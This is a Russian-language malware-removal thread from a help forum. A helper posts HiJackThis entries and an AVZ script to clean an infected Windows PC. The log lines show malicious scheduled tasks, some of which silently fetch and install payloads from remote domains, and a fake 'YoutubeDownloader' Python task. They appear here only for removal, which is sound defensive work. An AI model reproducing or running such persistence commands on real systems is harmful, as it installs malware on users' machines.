Здравствуйте!
Компьютер начал подвисать в режиме стоп кадра.Зависание особо видно в играх и при просмотре Ютуба.
Началось недели две назад с подмены некоторых роликов на Ютубе на рекламные ссылки.
Сейчас это не происходит, но новая напасть.
Здравствуйте!
Компьютер начал подвисать в режиме стоп кадра.Зависание особо видно в играх и при просмотре Ютуба.
Началось недели две назад с подмены некоторых роликов на Ютубе на рекламные ссылки.
Сейчас это не происходит, но новая напасть.
Последний раз редактировалось ХинГан; 25.04.2018 в 17:53.
Уважаемый(ая) ХинГан, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Здравствуйте,
HiJackThis (из каталога autologger)профиксить
Код:O2-32 - HKLM\..\BHO: MRSearchPlugin - {8E8F97CD-60B5-456F-A201-73065652D099} - (no file) O22 - Task: (disabled) Soft installer - C:\Users\Сергей\AppData\Local\CrashReportClient\2855013459_installcube.exe O22 - Task: YoutubeDownloader - C:\Users\D899~1\AppData\Roaming\YOUTUB~1\python\pythonw.exe "C:\Users\D899~1\AppData\Roaming\YOUTUB~1\ml.py" --APPNAME="YoutubeDownloader" O22 - Task: YoutubeDownloader2 - C:\Users\D899~1\AppData\Roaming\YOUTUB~1\python\pythonw.exe "C:\Users\D899~1\AppData\Roaming\YOUTUB~1\app.py" O22 - Task: {6943980D-C555-3EFD-5BD7-FDE5B121FEA7} - C:\Program Files (x86)\Common Files\CbAPej.exe /q /i http://freshrefreshnerer24.info/N9c0BQ0g3.7Br (file missing) O22 - Task: {CC5687CD-8370-B0D6-B350-60DE8CCC4498} - C:\Users\Сергей\cGIuIyuEk.exe /q /i http://freshrefreshnerer24rb.info/Zw7w61X8v.wNA
AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
После выполнения скрипта компьютер перезагрузится.Код:begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); TerminateProcessByName('C:\Windows\SysWOW64\TCHAR_x64.int'); QuarantineFile('G:\Новая папка\TanksTestingTool_RU\programData\help_AE.exe',''); QuarantineFile('C:\Users\Сергей\cGIuIyuEk.exe',''); QuarantineFile('C:\Program Files (x86)\Common Files\CbAPej.exe',''); QuarantineFile('C:\Users\D899~1\AppData\Roaming\YOUTUB~1\app.py',''); QuarantineFile('C:\Users\Сергей\AppData\Local\CrashReportClient\2855013459_installcube.exe',''); QuarantineFile('C:\Users\D899~1\AppData\Roaming\YOUTUB~1\ml.py',''); QuarantineFile('C:\Windows\SysWOW64\TCHAR_x64.int',''); DeleteFile('C:\Windows\SysWOW64\TCHAR_x64.int','32'); DeleteFile('C:\Users\D899~1\AppData\Roaming\YOUTUB~1\ml.py','32'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','YoutubeDownloader'); DeleteFile('C:\WINDOWS\system32\Tasks\Soft installer','64'); DeleteFile('C:\Users\Сергей\AppData\Local\CrashReportClient\2855013459_installcube.exe','32'); DeleteFile('C:\WINDOWS\system32\Tasks\YoutubeDownloader','64'); DeleteFile('C:\WINDOWS\system32\Tasks\YoutubeDownloader2','64'); DeleteFile('C:\Users\D899~1\AppData\Roaming\YOUTUB~1\app.py','32'); DeleteFile('C:\WINDOWS\system32\Tasks\{6943980D-C555-3EFD-5BD7-FDE5B121FEA7}','64'); DeleteFile('C:\Program Files (x86)\Common Files\CbAPej.exe','32'); DeleteFile('C:\WINDOWS\system32\Tasks\{CC5687CD-8370-B0D6-B350-60DE8CCC4498}','64'); DeleteFile('C:\Users\Сергей\cGIuIyuEk.exe','32'); BC_ImportAll; ExecuteSysClean; BC_Activate; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end.
После перезагрузки:
- Выполните в AVZ:
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.Код:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end.
- Подготовьте лог AdwCleaner и приложите его в теме.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Предоставленный код для HiJackThis не выполнил, этих строк в HiJackThis нет.
Карантин отправил.
Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 4
- В ходе лечения обнаружены вредоносные программы:
- c:\windows\syswow64\tchar_x64.int - HackTool.Win64.Phider.az
Уважаемый(ая) ХинГан, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.